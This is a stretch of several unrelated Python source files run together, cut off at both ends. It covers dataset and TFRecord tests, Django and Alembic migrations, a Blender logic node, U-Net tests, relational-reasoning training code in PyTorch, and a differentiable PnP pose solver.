tmp_dir: # Defines output directory. output_dir = Path(tmp_dir + "/output") output_dir.mkdir() # ----------------------------- # Generates and checks dataset. # ----------------------------- dataset_dir = Path(tmp_dir + "/synthetic") if coco: args = parser.parse_args( ["generate", str(dataset_dir), "--coco", "-v"] ) args.func(args) validate_coco_generator(dataset_dir) else: args = parser.parse_args(["generate", str(dataset_dir), "-v"]) args.func(args) validate_csv_generator(dataset_dir) # ---------------------------------------- # Transforms CSV dataset to the TFRecords. # ---------------------------------------- tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") args = parser.parse_args( ["transform", str(dataset_dir), str(tfrecords_dir), "-v"] ) args.func(args) validate_transformer(tfrecords_dir) # ------------------- # Explores TFRecords. # ------------------- for kind in ["train", "val", "test"]: args = parser.parse_args( [ "explore", str(tfrecords_dir / f"instances_{kind}"), ] ) args.func(args) stdout, _ = capsys.readouterr() validate_tfrecords_stdout(stdout, kind) # Grabs image ID for exploring individual records. if kind == "train": image_id = re.search( "(\\d+)\\s\\{(1|2|1,2|1,3|2,3|1,2,3)\\}", stdout, ).group(1) # ------------------------- # Explores single TFRecord. # ------------------------- assert image_id is not None args = parser.parse_args( [ "explore", str(tfrecords_dir / "instances_train"), image_id, str(output_dir), ] ) args.func(args) stdout, _ = capsys.readouterr() validate_tfrecord_stdout(stdout, image_id, output_dir) def test_csv_generator_transformer_explore_actions(capsys): """Tests the CSV data generate/transform/explore functions.""" core_action_testscript(capsys, coco=False) def test_coco_generator_transformer_explore_actions(capsys): """Tests the CSV data generate/transform/explore functions.""" core_action_testscript(capsys, coco=True) # ------------------------------------------------------------------------------ # Other Tests # ------------------------------------------------------------------------------ def test_categories_map(): categories_map = CategoriesMap([]) assert categories_map[1] == 1 assert categories_map[2] == 2 assert 2 in categories_map categories_map = CategoriesMap([3, 4]) assert categories_map[3] == 1 assert categories_map[4] == 2 assert 4 in categories_map assert 5 not in categories_map def test_no_tfrecords_found(capsys): """Tests no TFRecords found.""" parser = argparse.ArgumentParser() subparsers = parser.add_subparsers() explore(subparsers) with tempfile.TemporaryDirectory() as tmp_dir: tfrecords_dir = Path(tmp_dir) args = parser.parse_args(["explore", str(tfrecords_dir)]) args.func(args) stdout, _ = capsys.readouterr() validate_no_tfrecords(stdout) def test_unknown_transformation(): """Tests transform of an unknown dataset type.""" with tempfile.TemporaryDirectory() as tmp_dir: # Generates and checks CSV dataset dataset_dir = Path(tmp_dir + "/synthetic") dataset_dir.mkdir() with pytest.raises(InvalidDatasetFormat): dataset_dir = Path(tmp_dir + "/synthetic") # The dataset_dir does not contain either CSV or COCO data. create_tfrecords(dataset_dir) def test_reproducibility(): """Tests generate/transform/explore functions.""" def read_data(dataset_dir, filename): with open(dataset_dir / filename, "r") as file: return file.read() with tempfile.TemporaryDirectory() as tmp_dir: dataset_orig_dir = Path(tmp_dir + "/synthetic_orig") create_dataset(dataset_orig_dir, dataset_size=100, random_state=42) dataset_same_dir = Path(tmp_dir + "/synthetic_same") create_dataset(dataset_same_dir, dataset_size=100, random_state=42) dataset_diff_dir = Path(tmp_dir + "/synthetic_diff") create_dataset(dataset_diff_dir, dataset_size=100, random_state=None) for kind in ["train", "val", "test"]: expected = read_data(dataset_orig_dir, f"instances_{kind}.csv") actual_same = read_data(dataset_same_dir, f"instances_{kind}.csv") actual_diff = read_data(dataset_diff_dir, f"instances_{kind}.csv") assert actual_same == expected assert actual_diff != expected with tempfile.TemporaryDirectory() as tmp_dir: dataset_orig_dir = Path(tmp_dir + "/synthetic_orig") create_dataset( dataset_orig_dir, dataset_size=100, random_state=42, coco=True ) dataset_same_dir = Path(tmp_dir + "/synthetic_same") create_dataset( dataset_same_dir, dataset_size=100, random_state=42, coco=True ) dataset_diff_dir = Path(tmp_dir + "/synthetic_diff") create_dataset( dataset_diff_dir, dataset_size=100, random_state=None, coco=True ) for kind in ["train", "val", "test"]: expected = read_data( dataset_orig_dir, f"annotations/instances_{kind}.json" ).replace("_orig", "") actual_same = read_data( dataset_same_dir, f"annotations/instances_{kind}.json" ).replace("_same", "") actual_diff = read_data( dataset_diff_dir, f"annotations/instances_{kind}.json" ).replace("_diff", "") # Removes time stamps. expected = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", expected ) actual_same = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", actual_same ) actual_diff = re.sub( r"\d{4}-\d{2}-\d{2}\s\d{2}:\d{2}:\d{2}", "", actual_diff ) assert actual_same == expected assert actual_diff != expected # ------------------------------------------------------------------------------ # Data Loader Tests # ------------------------------------------------------------------------------ def test_data_loader(capsys): """Tests data loader for model for training and validation.""" with tempfile.TemporaryDirectory() as tmp_dir: dataset_dir = Path(tmp_dir + "/synthetic") tfrecords_dir = Path(tmp_dir + "/synthetic-tfrecords") create_dataset(dataset_dir) create_tfrecords(dataset_dir) # ------------------------------------ # Tests checkers for loader arguments. # ------------------------------------ with pytest.raises(ValueError, match="The output schema is empty."): load_tfrecords(tfrecords_dir, output_schema="") with pytest.raises( ValueError, match="The output schema contains multiple 'I'", ): load_tfrecords(tfrecords_dir, output_schema="II") with pytest.raises( ValueError, match="The output schema contains multiple 'B", ): load_tfrecords(tfrecords_dir, output_schema="BB") with pytest.raises( ValueError, match="The output schema contains multiple 'M", ): load_tfrecords(tfrecords_dir, output_schema="MM") with pytest.raises( ValueError, match="The output schema contains multiple 'C", ): load_tfrecords(tfrecords_dir, output_schema="CC") with pytest.raises( ValueError, match="The output schema contains two consequent commas.", ): load_tfrecords(tfrecords_dir, output_schema=",,") with pytest.raises( ValueError, match="The output schema contains unknown element 'X'.", ): load_tfrecords(tfrecords_dir, output_schema="X") # ---------------------------------- # Tests data load for single output. # ---------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="C", verbose=True ) assert steps_per_epoch > 0 for X, y in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) break # ---------------------------------------- # Tests data load for concatinated output. # ---------------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="BMC" ) assert steps_per_epoch > 0 for X, y in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == ( BATCH_SIZE, NUM_DETECTING_OBJECTS, IMAGE_WIDTH * IMAGE_HEIGHT + 4 + 4, ) break # ---------------------------------------- # Tests data load for concatinated output. # ---------------------------------------- dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="I,BMC" ) assert steps_per_epoch > 0 for Xi, (Xo, y) in dataset: assert Xi.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert Xo.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert y.shape == ( BATCH_SIZE, NUM_DETECTING_OBJECTS, IMAGE_WIDTH * IMAGE_HEIGHT + 4 + 4, ) break dataset, steps_per_epoch = load_tfrecords( tfrecords_dir / "instances_train", output_schema="B,C" ) assert steps_per_epoch > 0 for Xi, (yb, yc) in dataset: assert X.shape == ( BATCH_SIZE, IMAGE_WIDTH, IMAGE_HEIGHT, IMAGE_CHANNELS, ) assert yb.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) assert yc.shape == (BATCH_SIZE, NUM_DETECTING_OBJECTS, 4) break # Generated by Django 3.1.3 on 2020-11-16 14:50 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('projects', '0019_googlesheetssource'), ] operations = [ migrations.CreateModel( name='GithubRepo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('refreshed', models.DateTimeField(auto_now=True, help_text='The date-time that this information was last refreshed from GitHub.')), ('full_name', models.CharField(help_text='The full name of the repository ie. owner/name', max_length=512)), ('image_url', models.URLField(help_text='The URL for an image associated with the repository.')), ('permissions', models.JSONField(help_text='A JSON object with permissions that the user has for the repo.')), ('updated', models.DateTimeField(help_text='The date-time that the repository was last updated.')), ('user', models.ForeignKey(help_text='The user who has access to the repository.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), migrations.AddConstraint( model_name='githubrepo', constraint=models.UniqueConstraint(fields=('user', 'full_name'), name='githubrepo_unique_user_full_name'), ), ] 1-10 import bpy from bpy.props import * from bpy.types import Node, NodeSocket from arm.logicnode.arm_nodes import * class RadToDegNode(Node, ArmLogicTreeNode): '''Radians to degrees node''' bl_idname = 'LNRadToDegNode' bl_label = 'Rad to Deg' bl_icon = 'QUESTION' def init(self, context): self.inputs.new('NodeSocketFloat', 'Radians') self.outputs.new('NodeSocketFloat', 'Degrees') add_node(RadToDegNode, category='Value') import tensorflow as tf import numpy as np from sciml_bench.benchmarks.slstr_cloud.model import unet def test_unet(): model = unet((128, 128, 2)) assert isinstance(model, tf.keras.Model) assert model.input_shape == (None, 128, 128, 2) assert model.output_shape == (None, 128, 128, 1) def test_unet_predict(): model = unet((128, 128, 2)) output = model.predict(np.random.random((1, 128, 128, 2))) assert output.shape == (1, 128, 128, 1) def test_unet_fit(): X = np.random.random((1, 128, 128, 2)) Y = np.random.randint(0, 1, size=(1, 128, 128, 1)) model = unet((128, 128, 2)) model.compile(loss='binary_crossentropy', optimizer='adam') history = model.fit(X, Y) assert isinstance(history, tf.keras.callbacks.History) 0 # Copyright (C) 2019 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 """ Remove title unique contraint from control model Create Date: 2019-02-26 12:49:13.358736 """ # disable Invalid constant name pylint warning for mandatory Alembic variables. # pylint: disable=invalid-name from alembic import op # revision identifiers, used by Alembic. revision = '7d10655e87f9' down_revision = '3b6acfd18e5c' def upgrade(): """Upgrade database schema and/or data, creating a new revision.""" op.drop_constraint('uq_t_controls', 'controls', type_='unique') def downgrade(): """Downgrade database schema and/or data back to the previous revision.""" raise NotImplementedError() # -*- coding: utf-8 -*- import torch from optim.pytorchtools import EarlyStopping import torch.nn as nn class RelationalReasoning(torch.nn.Module): def __init__(self, backbone, feature_size=64): super(RelationalReasoning, self).__init__() self.backbone = backbone self.relation_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, 1)) def aggregate(self, features, K): relation_pairs_list = list() targets_list = list() size = int(features.shape[0] / K) shifts_counter=1 for index_1 in range(0, size*K, size): for index_2 in range(index_1+size, size*K, size): # Using the 'cat' aggregation function by default pos1 = features[index_1:index_1 + size] pos2 = features[index_2:index_2+size] pos_pair = torch.cat([pos1, pos2], 1) # (batch_size, fz*2) # Shuffle without collisions by rolling the mini-batch (negatives) neg1 = torch.roll(features[index_2:index_2 + size], shifts=shifts_counter, dims=0) neg_pair1 = torch.cat([pos1, neg1], 1) # (batch_size, fz*2) relation_pairs_list.append(pos_pair) relation_pairs_list.append(neg_pair1) targets_list.append(torch.ones(size, dtype=torch.float32).cuda()) targets_list.append(torch.zeros(size, dtype=torch.float32).cuda()) shifts_counter+=1 if(shifts_counter>=size): shifts_counter=1 # avoid identity pairs relation_pairs = torch.cat(relation_pairs_list, 0).cuda() # K(K-1) * (batch_size, fz*2) targets = torch.cat(targets_list, 0).cuda() return relation_pairs, targets def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.relation_head.parameters()}], lr=opt.learning_rate) BCE = torch.nn.BCEWithLogitsLoss() self.backbone.train() self.relation_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data_augmented, _) in enumerate(train_loader): K = len(data_augmented) # tot augmentations x = torch.cat(data_augmented, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features = self.backbone(x) # aggregation function relation_pairs, targets = self.aggregate(features, K) # forward pass (relation head) score = self.relation_head(relation_pairs).squeeze() # cross-entropy loss and backward loss = BCE(score, targets) loss.backward() optimizer.step() # estimate the accuracy predicted = torch.round(torch.sigmoid(score)) correct = predicted.eq(targets.view_as(predicted)).sum() accuracy = (100.0 * correct / float(len(targets))) acc_epoch += accuracy.item() loss_epoch += loss.item() acc_epoch /= len(train_loader) loss_epoch /= len(train_loader) if acc_epoch>acc_max: acc_max = acc_epoch epoch_max = epoch early_stopping(acc_epoch, self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, Max ACC.= {:.1f}%, Max Epoch={}' \ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch, acc_max, epoch_max)) return acc_max, epoch_max class RelationalReasoning_Intra(torch.nn.Module): def __init__(self, backbone, feature_size=64, nb_class=3): super(RelationalReasoning_Intra, self).__init__() self.backbone = backbone self.cls_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, nb_class), torch.nn.Softmax(), ) def run_test(self, predict, labels): correct = 0 pred = predict.data.max(1)[1] correct = pred.eq(labels.data).cpu().sum() return correct, len(labels.data) def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.cls_head.parameters()}, ], lr=opt.learning_rate) c_criterion = nn.CrossEntropyLoss() self.backbone.train() self.cls_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 acc_epoch_cls=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data_augmented0, data_augmented1, data_label, _) in enumerate(train_loader): K = len(data_augmented0) # tot augmentations x_cut0 = torch.cat(data_augmented0, 0).cuda() x_cut1 = torch.cat(data_augmented1, 0).cuda() c_label = torch.cat(data_label, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features_cut0 = self.backbone(x_cut0) features_cut1 = self.backbone(x_cut1) features_cls = torch.cat([features_cut0, features_cut1], 1) # score_intra = self.relation_head(relation_pairs_intra).squeeze() c_output = self.cls_head(features_cls) correct_cls, length_cls = self.run_test(c_output, c_label) loss_c = c_criterion(c_output, c_label) loss=loss_c loss.backward() optimizer.step() # estimate the accuracy loss_epoch += loss.item() accuracy_cls = 100. * correct_cls / length_cls acc_epoch_cls += accuracy_cls.item() acc_epoch_cls /= len(train_loader) loss_epoch /= len(train_loader) if acc_epoch_cls>acc_max: acc_max = acc_epoch_cls epoch_max = epoch early_stopping(acc_epoch_cls, self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, CLS.= {:.2f}%, ' 'Max ACC.= {:.1f}%, Max Epoch={}' \ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch,acc_epoch_cls, acc_max, epoch_max)) return acc_max, epoch_max class RelationalReasoning_InterIntra(torch.nn.Module): def __init__(self, backbone, feature_size=64, nb_class=3): super(RelationalReasoning_InterIntra, self).__init__() self.backbone = backbone self.relation_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, 1)) self.cls_head = torch.nn.Sequential( torch.nn.Linear(feature_size*2, 256), torch.nn.BatchNorm1d(256), torch.nn.LeakyReLU(), torch.nn.Linear(256, nb_class), torch.nn.Softmax(), ) # self.softmax = nn.Softmax() def aggregate(self, features, K): relation_pairs_list = list() targets_list = list() size = int(features.shape[0] / K) shifts_counter=1 for index_1 in range(0, size*K, size): for index_2 in range(index_1+size, size*K, size): # Using the 'cat' aggregation function by default pos1 = features[index_1:index_1 + size] pos2 = features[index_2:index_2+size] pos_pair = torch.cat([pos1, pos2], 1) # (batch_size, fz*2) # Shuffle without collisions by rolling the mini-batch (negatives) neg1 = torch.roll(features[index_2:index_2 + size], shifts=shifts_counter, dims=0) neg_pair1 = torch.cat([pos1, neg1], 1) # (batch_size, fz*2) relation_pairs_list.append(pos_pair) relation_pairs_list.append(neg_pair1) targets_list.append(torch.ones(size, dtype=torch.float32).cuda()) targets_list.append(torch.zeros(size, dtype=torch.float32).cuda()) shifts_counter+=1 if(shifts_counter>=size): shifts_counter=1 # avoid identity pairs relation_pairs = torch.cat(relation_pairs_list, 0).cuda() # K(K-1) * (batch_size, fz*2) targets = torch.cat(targets_list, 0).cuda() return relation_pairs, targets def run_test(self, predict, labels): correct = 0 pred = predict.data.max(1)[1] correct = pred.eq(labels.data).cpu().sum() return correct, len(labels.data) def train(self, tot_epochs, train_loader, opt): patience = opt.patience early_stopping = EarlyStopping(patience, verbose=True, checkpoint_pth='{}/backbone_best.tar'.format(opt.ckpt_dir)) optimizer = torch.optim.Adam([ {'params': self.backbone.parameters()}, {'params': self.relation_head.parameters()}, {'params': self.cls_head.parameters()}, ], lr=opt.learning_rate) BCE = torch.nn.BCEWithLogitsLoss() c_criterion = nn.CrossEntropyLoss() self.backbone.train() self.relation_head.train() self.cls_head.train() epoch_max = 0 acc_max=0 for epoch in range(tot_epochs): acc_epoch=0 acc_epoch_cls=0 loss_epoch=0 # the real target is discarded (unsupervised) for i, (data, data_augmented0, data_augmented1, data_label, _) in enumerate(train_loader): K = len(data) # tot augmentations x = torch.cat(data, 0).cuda() x_cut0 = torch.cat(data_augmented0, 0).cuda() x_cut1 = torch.cat(data_augmented1, 0).cuda() c_label = torch.cat(data_label, 0).cuda() optimizer.zero_grad() # forward pass (backbone) features = self.backbone(x) features_cut0 = self.backbone(x_cut0) features_cut1 = self.backbone(x_cut1) features_cls = torch.cat([features_cut0, features_cut1], 1) # aggregation function relation_pairs, targets = self.aggregate(features, K) # relation_pairs_intra, targets_intra = self.aggregate_intra(features_cut0, features_cut1, K) # forward pass (relation head) score = self.relation_head(relation_pairs).squeeze() c_output = self.cls_head(features_cls) correct_cls, length_cls = self.run_test(c_output, c_label) # cross-entropy loss and backward loss = BCE(score, targets) loss_c = c_criterion(c_output, c_label) loss+=loss_c loss.backward() optimizer.step() # estimate the accuracy predicted = torch.round(torch.sigmoid(score)) correct = predicted.eq(targets.view_as(predicted)).sum() accuracy = (100.0 * correct / float(len(targets))) acc_epoch += accuracy.item() loss_epoch += loss.item() accuracy_cls = 100. * correct_cls / length_cls acc_epoch_cls += accuracy_cls.item() acc_epoch /= len(train_loader) acc_epoch_cls /= len(train_loader) loss_epoch /= len(train_loader) if (acc_epoch+acc_epoch_cls)>acc_max: acc_max = (acc_epoch+acc_epoch_cls) epoch_max = epoch early_stopping((acc_epoch+acc_epoch_cls), self.backbone) if early_stopping.early_stop: print("Early stopping") break if (epoch+1)%opt.save_freq==0: print("[INFO] save backbone at epoch {}!".format(epoch)) torch.save(self.backbone.state_dict(), '{}/backbone_{}.tar'.format(opt.ckpt_dir, epoch)) print('Epoch [{}][{}][{}] loss= {:.5f}; Epoch ACC.= {:.2f}%, CLS.= {:.2f}%, ' 'Max ACC.= {:.1f}%, Max Epoch={}' \ .format(epoch + 1, opt.model_name, opt.dataset_name, loss_epoch, acc_epoch,acc_epoch_cls, acc_max, epoch_max)) return acc_max, epoch_max import torch import cv2 import numpy as np import logging import typing # NOTE: https://github.com/BoChenYS/BPnP # NOTE: https://arxiv.org/pdf/1909.06043.pdf log = logging.getLogger(__name__) try: import kornia as kn except ImportError: log.error("Kornia is required for BPnP, please install it before proceeding.") __all__ = ["BPnP"] def _batch_project(P, pts3d, K, angle_axis=True): n = pts3d.size(0) bs = P.size(0) device = P.device pts3d_h = torch.cat((pts3d, torch.ones(n, 1, device=device)), dim=-1) if angle_axis: R_out = kn.angle_axis_to_rotation_matrix(P[:, 0:3].reshape(bs, 3)) PM = torch.cat((R_out[:, 0:3, 0:3], P[:, 3:6].reshape(bs, 3, 1)), dim=-1) else: PM = P pts3d_cam = pts3d_h.matmul(PM.transpose(-2, -1)) pts2d_proj = pts3d_cam.matmul(K.t()) S = pts2d_proj[:,:, 2].reshape(bs, n, 1) pts2d_pro = pts2d_proj[:, :, 0:2] / (S + 1e-12) return pts2d_pro def _get_coefs(P_6d, pts3d, K): device = P_6d.device n = pts3d.size(0) m = P_6d.size(-1) coefs = torch.zeros(n, 2, m, device=device) torch.set_grad_enabled(True) y = P_6d.repeat(n, 1) proj = _batch_project(y, pts3d, K).squeeze() vec = torch.diag(torch.ones(n,device=device).float()) for k in range(2): torch.set_grad_enabled(True) y_grad = torch.autograd.grad(proj[:, :, k], y, vec, retain_graph=True, create_graph=True) coefs[:, k, :] = -2.0 * y_grad[0].clone() return coefs class BPnPFunction_fast(torch.autograd.Function): """ BPnP_fast is the efficient version of the BPnP class which ignores the higher order dirivatives through the coefs' graph. This sacrifices negligible gradient accuracy yet saves significant runtime. INPUTS: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] OUTPUT: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: This BPnP function assumes that all sets of 2D points in the mini-batch correspond to one common set of 3D points. For situations where pts3d is also a mini-batch, use the BPnP_m3d class. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n,1,2)) pts3d_i_np = np.ascontiguousarray(pts3d[i].detach().cpu()).reshape((n,3)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False) else: rvec0 = np.array(ini_pose[i, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[i, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) angle_axis = torch.tensor(rvec,device=device,dtype=torch.float).reshape(1, 3) T = torch.tensor(T,device=device,dtype=torch.float).reshape(1, 3) P_6d[i,:] = torch.cat((angle_axis,T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m,m, device=device) J_fx = torch.zeros(m,2*n, device=device) J_fz = torch.zeros(m,3*n, device=device) J_fK = torch.zeros(m, 9, device=device) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d[i].clone().reshape(-1).detach().requires_grad_() coefs = _get_coefs(P_6d[i].reshape(1,6), pts3d_flat.reshape(n,3), K).detach() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): torch.set_grad_enabled(True) if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0:m-3].reshape(1,3)) P = torch.cat((R[0,0:3,0:3].reshape(3,3), P_6d_flat[m-3:m].reshape(3,1)),dim=-1) KP = torch.mm(K_flat.reshape(3,3), P) pts2d_i = pts2d_flat.reshape(n,2).transpose(0,1) pts3d_i = torch.cat((pts3d_flat.reshape(n,3),torch.ones(n,1,device=device)),dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2,:].reshape(1,n) r = pts2d_i*Si-proj_i[0:2,:] coef = coefs[:,:,j].transpose(0,1) # size: [2,n] fj = (coef*r).sum() fj.backward() J_fy[j,:] = P_6d_flat.grad.clone() J_fx[j,:] = pts2d_flat.grad.clone() J_fz[j,:] = pts3d_flat.grad.clone() J_fK[j,:] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1) * torch.mm(inv_J_fy, J_fx) J_yz = (-1) * torch.mm(inv_J_fy, J_fz) J_yK = (-1) * torch.mm(inv_J_fy, J_fK) grad_x[i] = grad_output[i].reshape(1,m).mm(J_yx).reshape(n,2) grad_z += grad_output[i].reshape(1,m).mm(J_yz).reshape(n,3) grad_K += grad_output[i].reshape(1,m).mm(J_yK).reshape(3,3) return grad_x, grad_z, grad_K, None class BPnPFunction_m3d(torch.autograd.Function): """ BPnP_m3d supports mini-batch inputs of 3D keypoints, where the i-th set of 2D keypoints correspond to the i-th set of 3D keypoints. INPUTS: pts2d - the 2D keypoints coordinates of size [batch_size, num_keypoints, 2] pts3d - the 3D keypoints coordinates of size [batch_size, num_keypoints, 3] K - the camera intrinsic matrix of size [3, 3] OUTPUT: P_6d - the 6 DOF poses of size [batch_size, 6], where the first 3 elements of each row are the angle-axis rotation vector (Euler vector) and the last 3 elements are the translation vector. NOTE: For situations where all sets of 2D points in the mini-batch correspond to one common set of 3D points, use the BPnP class. """ @staticmethod def forward(ctx, pts2d, pts3d, K, ini_pose=None): bs = pts2d.size(0) n = pts2d.size(1) device = pts2d.device K_np = np.array(K.detach().cpu()) P_6d = torch.zeros(bs,6,device=device) for i in range(bs): pts2d_i_np = np.ascontiguousarray(pts2d[i].detach().cpu()).reshape((n,1,2)) pts3d_i_np = np.ascontiguousarray(pts3d[i].detach().cpu()).reshape((n,3)) if ini_pose is None: _, rvec0, T0 = cv2.solvePnP( objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=False) else: rvec0 = np.array(ini_pose[i, 0:3].cpu().reshape(3, 1)) T0 = np.array(ini_pose[i, 3:6].cpu().reshape(3, 1)) _, rvec, T = cv2.solvePnP(objectPoints=pts3d_i_np, imagePoints=pts2d_i_np, cameraMatrix=K_np, distCoeffs=None, flags=cv2.SOLVEPNP_ITERATIVE, useExtrinsicGuess=True, rvec=rvec0, tvec=T0) angle_axis = torch.tensor(rvec,device=device,dtype=torch.float).reshape(1, 3) T = torch.tensor(T,device=device,dtype=torch.float).reshape(1, 3) P_6d[i,:] = torch.cat((angle_axis,T),dim=-1) ctx.save_for_backward(pts2d,P_6d,pts3d,K) return P_6d @staticmethod def backward(ctx, grad_output): pts2d, P_6d, pts3d, K = ctx.saved_tensors device = pts2d.device bs = pts2d.size(0) n = pts2d.size(1) m = 6 grad_x = torch.zeros_like(pts2d) grad_z = torch.zeros_like(pts3d) grad_K = torch.zeros_like(K) for i in range(bs): J_fy = torch.zeros(m,m, device=device) J_fx = torch.zeros(m,2*n, device=device) J_fz = torch.zeros(m,3*n, device=device) J_fK = torch.zeros(m, 9, device=device) torch.set_grad_enabled(True) pts2d_flat = pts2d[i].clone().reshape(-1).detach().requires_grad_() P_6d_flat = P_6d[i].clone().reshape(-1).detach().requires_grad_() pts3d_flat = pts3d[i].clone().reshape(-1).detach().requires_grad_() K_flat = K.clone().reshape(-1).detach().requires_grad_() for j in range(m): torch.set_grad_enabled(True) if j > 0: pts2d_flat.grad.zero_() P_6d_flat.grad.zero_() pts3d_flat.grad.zero_() K_flat.grad.zero_() R = kn.angle_axis_to_rotation_matrix(P_6d_flat[0:m-3].reshape(1,3)) P = torch.cat((R[0,0:3,0:3].reshape(3,3), P_6d_flat[m-3:m].reshape(3,1)),dim=-1) KP = torch.mm(K_flat.reshape(3,3), P) pts2d_i = pts2d_flat.reshape(n,2).transpose(0,1) pts3d_i = torch.cat((pts3d_flat.reshape(n,3),torch.ones(n,1,device=device)),dim=-1).t() proj_i = KP.mm(pts3d_i) Si = proj_i[2,:].reshape(1,n) r = pts2d_i*Si-proj_i[0:2,:] coefs = _get_coefs(P_6d_flat.reshape(1,6), pts3d_flat.reshape(n,3), K_flat.reshape(3,3)) coef = coefs[:,:,j].transpose(0,1) # size: [2,n] fj = (coef*r).sum() fj.backward() J_fy[j,:] = P_6d_flat.grad.clone() J_fx[j,:] = pts2d_flat.grad.clone() J_fz[j,:] = pts3d_flat.grad.clone() J_fK[j,:] = K_flat.grad.clone() inv_J_fy = torch.inverse(J_fy) J_yx = (-1) * 